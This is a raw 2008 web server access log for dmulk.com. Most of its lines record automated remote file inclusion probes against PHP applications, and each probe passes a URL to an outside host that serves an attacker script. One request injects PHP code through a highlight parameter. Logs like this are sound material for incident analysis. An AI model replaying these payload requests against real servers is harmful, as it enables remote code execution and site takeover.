98.136.50.138 - - [26/Oct/2008:10:41:36 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.55.161.154 - - [26/Oct/2008:10:41:36 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
83.102.137.163 - - [26/Oct/2008:10:41:36 -0700] "GET /logs/access_080703.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:41:37 -0700] "GET /logs/access_080410.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.50.211.121 - - [26/Oct/2008:10:41:37 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.50.211.121 - - [26/Oct/2008:10:41:37 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.102.137.163 - - [26/Oct/2008:10:41:37 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:41:37 -0700] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.102.137.163 - - [26/Oct/2008:10:41:37 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:41:44 -0700] "GET /logs/access_080518.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:41:52 -0700] "GET /logs/access_080703.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.251.182 - - [26/Oct/2008:10:41:52 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.251.182 - - [26/Oct/2008:10:41:53 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.251.182 - - [26/Oct/2008:10:41:58 -0700] "GET /logs/access_080518.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.200.195.110 - - [26/Oct/2008:10:42:05 -0700] "GET /logs/access_080410.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.200.195.110 - - [26/Oct/2008:10:42:06 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:42:06 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:42:07 -0700] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:42:08 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:42:09 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.161.154 - - [26/Oct/2008:10:42:11 -0700] "GET /logs/access_080506.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
69.50.211.121 - - [26/Oct/2008:10:42:13 -0700] "GET /logs/access_080506.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:10:42:15 -0700] "GET /calendar.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:10:42:20 -0700] "GET /calendar.php?p=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.241.229 - - [26/Oct/2008:10:42:23 -0700] "GET /inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.234.37.61 - - [26/Oct/2008:10:42:25 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
201.234.37.61 - - [26/Oct/2008:10:42:25 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:42:40 -0700] "GET /logs/access_080224.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.200.195.110 - - [26/Oct/2008:10:42:42 -0700] "GET /logs/access_080506.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:42:44 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0102.jpg HTTP/1.1" 200 477043 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:42:48 -0700] "GET /logs/access_080715.log//calendar.php?p=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.149.118.74 - - [26/Oct/2008:10:42:48 -0700] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.149.118.74 - - [26/Oct/2008:10:42:49 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:42:50 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:10:42:50 -0700] "GET /logs/access_080715.log//calendar.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:42:51 -0700] "GET /calendar.php?p=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:10:42:51 -0700] "GET /calendar.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:10:42:52 -0700] "GET /logs//calendar.php?p=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:10:42:53 -0700] "GET /logs//calendar.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:43:01 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:43:01 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:10:43:05 -0700] "GET /logs/access_080322.log//calendar.php?pg=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:10:43:09 -0700] "GET /calendar.php?pg=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:10:43:10 -0700] "GET /logs//calendar.php?pg=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.162.129 - - [26/Oct/2008:10:43:17 -0700] "GET /logs/access_071214.log//zeroboard/errors.php?error=http://www2.osrd.go.th/webboard/avatars/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:43:17 -0700] "GET /logs//zeroboard/errors.php?error=http://www2.osrd.go.th/webboard/avatars/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.162.129 - - [26/Oct/2008:10:43:17 -0700] "GET /zeroboard/errors.php?error=http://www2.osrd.go.th/webboard/avatars/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:43:18 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:43:18 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:43:31 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-110_1.jpg HTTP/1.1" 200 276708 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:43:34 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-025_3.jpg HTTP/1.1" 200 341348 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:43:36 -0700] "GET /logs/access_081015.log//twindow_search_rank.php?shop_this_skin_path=http://nawaoh1.t35.com/cd/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:43:50 -0700] "GET /logs/access_080418.log/index.php?option=com_phpshop&page=shop.browse&category_id=&option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.macbuff.com/my/plugins/spamx/magpierss/extlib/css.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:43:50 -0700] "GET /logs/index.php?option=com_phpshop&page=shop.browse&category_id=&option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.macbuff.com/my/plugins/spamx/magpierss/extlib/css.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.61.244.6 - - [26/Oct/2008:10:43:50 -0700] "GET /index.php?option=com_phpshop&page=shop.browse&category_id=&option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.macbuff.com/my/plugins/spamx/magpierss/extlib/css.php/bo.do??? HTTP/1.1" 200 95773 "-" "libwww-perl/5.76" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:43:57 -0700] "GET /logs/access_080615.log/index.php?option=com_phpshop&page=shop.browse&category_id=&option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.macbuff.com/my/plugins/spamx/magpierss/extlib/css.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:10:44:13 -0700] "GET /calendar.php?pg=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:44:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-141_0.jpg HTTP/1.1" 200 312862 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:44:24 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0118.jpg HTTP/1.1" 200 395556 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
74.6.22.187 - - [26/Oct/2008:10:44:24 -0700] "GET /logs/access_071215.log HTTP/1.0" 200 124992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.30.20.130 - - [26/Oct/2008:10:44:26 -0700] "GET /logs/access_080703.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.30.20.130 - - [26/Oct/2008:10:44:27 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.30.20.130 - - [26/Oct/2008:10:44:28 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.30.20.130 - - [26/Oct/2008:10:44:34 -0700] "GET /logs/access_080518.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.232.68.10 - - [26/Oct/2008:10:44:37 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.10 - - [26/Oct/2008:10:44:38 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:44:39 -0700] "GET /logs/access_080609.log/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.macbuff.com/my/plugins/spamx/magpierss/extlib/css.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:44:40 -0700] "GET /logs/access_080724.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:44:40 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:44:40 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:44:40 -0700] "GET /logs/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.macbuff.com/my/plugins/spamx/magpierss/extlib/css.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.33.51.184 - - [26/Oct/2008:10:44:40 -0700] "GET /index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.macbuff.com/my/plugins/spamx/magpierss/extlib/css.php/bo.do??? HTTP/1.1" 200 95528 "-" "libwww-perl/5.805" "www.dmulk.com"
64.33.51.184 - - [26/Oct/2008:10:44:44 -0700] "GET /logs/access_080621.log/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.macbuff.com/my/plugins/spamx/magpierss/extlib/css.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:44:50 -0700] "GET /logs/access_080724.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:44:50 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:44:50 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
195.149.118.74 - - [26/Oct/2008:10:44:52 -0700] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:45:01 -0700] "GET /logs/access_080322.log//calendar.php?p=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:45:04 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:45:06 -0700] "GET /calendar.php?p=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:10:45:07 -0700] "GET /logs//calendar.php?p=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.108.193.138 - - [26/Oct/2008:10:45:14 -0700] "GET /logs/access_080616.log/ncaster/admin/addons/archive/archive.php?adminfolder=uid=0(root)%20gid=100(users)%20groups=14(uucp),16(dialout),17(audio),33(video),100(users)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.148.64.85 - - [26/Oct/2008:10:45:16 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://bugisku.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.148.64.85 - - [26/Oct/2008:10:45:16 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://bugisku.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.148.64.85 - - [26/Oct/2008:10:45:16 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://bugisku.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.148.64.85 - - [26/Oct/2008:10:45:16 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://bugisku.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:10:45:19 -0700] "GET /logs/access_071229.log//calendar.php?p=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.108.193.138 - - [26/Oct/2008:10:45:20 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=uid=0(root)%20gid=100(users)%20groups=14(uucp),16(dialout),17(audio),33(video),100(users)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:45:22 -0700] "GET /logs/access_080110.log HTTP/1.1" 200 682778 "http://search.yahoo.com/search?ei=UTF-8&fr=ytff-msgr&p=www.+jan.+sakura.+ne" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "www.dmulk.com"
75.65.106.95 - - [26/Oct/2008:10:45:28 -0700] "GET /logs/access_080110.log HTTP/1.1" 206 217575 "http://search.yahoo.com/search?ei=UTF-8&fr=ytff-msgr&p=www.+jan.+sakura.+ne" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:45:29 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0072.jpg HTTP/1.1" 200 274927 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
207.58.170.67 - - [26/Oct/2008:10:45:33 -0700] "GET /logs/access_080115.log/errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.170.67 - - [26/Oct/2008:10:45:33 -0700] "GET /logs/access_080115.log/errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.170.67 - - [26/Oct/2008:10:45:34 -0700] "GET /errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.170.67 - - [26/Oct/2008:10:45:34 -0700] "GET /logs/errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:45:34 -0700] "GET /logs/access_080529.log/errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.170.67 - - [26/Oct/2008:10:45:34 -0700] "GET /errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:45:34 -0700] "GET /logs/errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.170.67 - - [26/Oct/2008:10:45:34 -0700] "GET /logs/access_080529.log/errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
174.133.202.130 - - [26/Oct/2008:10:45:35 -0700] "GET /logs/access_080115.log/errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
174.133.202.130 - - [26/Oct/2008:10:45:36 -0700] "GET /errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:45:36 -0700] "GET /logs/errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:45:36 -0700] "GET /logs/access_080529.log/errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
174.133.202.130 - - [26/Oct/2008:10:45:36 -0700] "GET /logs/access_080115.log/errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
174.133.202.130 - - [26/Oct/2008:10:45:36 -0700] "GET /errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
174.133.202.130 - - [26/Oct/2008:10:45:36 -0700] "GET /logs/errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
174.133.202.130 - - [26/Oct/2008:10:45:36 -0700] "GET /logs/access_080529.log/errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.235.90.6 - - [26/Oct/2008:10:45:43 -0700] "GET /logs/access_080115.log/errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.235.90.6 - - [26/Oct/2008:10:45:43 -0700] "GET /errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:45:43 -0700] "GET /logs/errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:45:43 -0700] "GET /logs/access_080529.log/errors.php?error=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
